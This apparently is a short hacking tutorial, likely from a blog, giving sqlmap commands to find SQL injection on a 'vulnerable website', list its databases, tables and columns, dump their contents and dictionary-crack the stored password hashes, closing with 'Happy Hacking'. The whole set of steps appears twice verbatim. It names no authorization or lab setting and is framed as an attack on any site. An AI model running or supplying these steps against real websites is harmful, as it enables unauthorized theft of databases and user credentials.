Open terminal and execute the following command.
sqlmap –u <URL of the vulnerable website> --dbs
It will check for the SQL vulnerability. If it is vulnerable, it will identify target SQL server database information.
To retrieve the table names from database, execute below command
sqlmap –u <URL of the vulnerable website> -D <database> --tables
Next, to extract columns from the tables, execute following command
sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> --columns
To extract the content from the selected columns in tables
sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> -C <columnnames> --dump
Tool will try to perform Dictionary-based attack on stored hashes to identify plain text password.
Happy Hacking
sqlmap –u <URL of the vulnerable website> --dbs
It will check for the SQL vulnerability. If it is vulnerable, it will identify target SQL server database information.
To retrieve the table names from database, execute below command
sqlmap –u <URL of the vulnerable website> -D <database> --tables
Next, to extract columns from the tables, execute following command
sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> --columns
To extract the content from the selected columns in tables
sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> -C <columnnames> --dump
Tool will try to perform Dictionary-based attack on stored hashes to identify plain text password.
Happy Hacking
No comments:
Post a Comment